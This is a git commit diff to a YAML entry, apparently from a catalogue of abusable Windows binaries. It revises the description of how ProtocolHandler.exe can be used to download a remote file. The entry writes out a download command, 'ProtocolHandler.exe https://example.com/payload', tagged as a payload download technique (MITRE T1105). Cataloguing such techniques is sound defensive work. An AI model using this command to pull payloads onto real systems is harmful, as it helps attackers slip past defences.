Update ProtocolHandler.yml (#267)

Co-authored-by: Wietze <wietze@users.noreply.github.com>
This commit is contained in:
C-h4ck-0 2023-06-18 00:18:06 +03:00 committed by GitHub
parent d71415de77
commit 8aca00a56b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -6,7 +6,7 @@ Created: 2022-07-24
Commands:
- Command: ProtocolHandler.exe https://example.com/payload
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Usecase: "It will open the specified URL in the default web browser, which (if the URL points to a file) will often result in the file being downloaded to the user's Downloads folder (without user interaction)"
Category: Download
Privileges: User
MitreID: T1105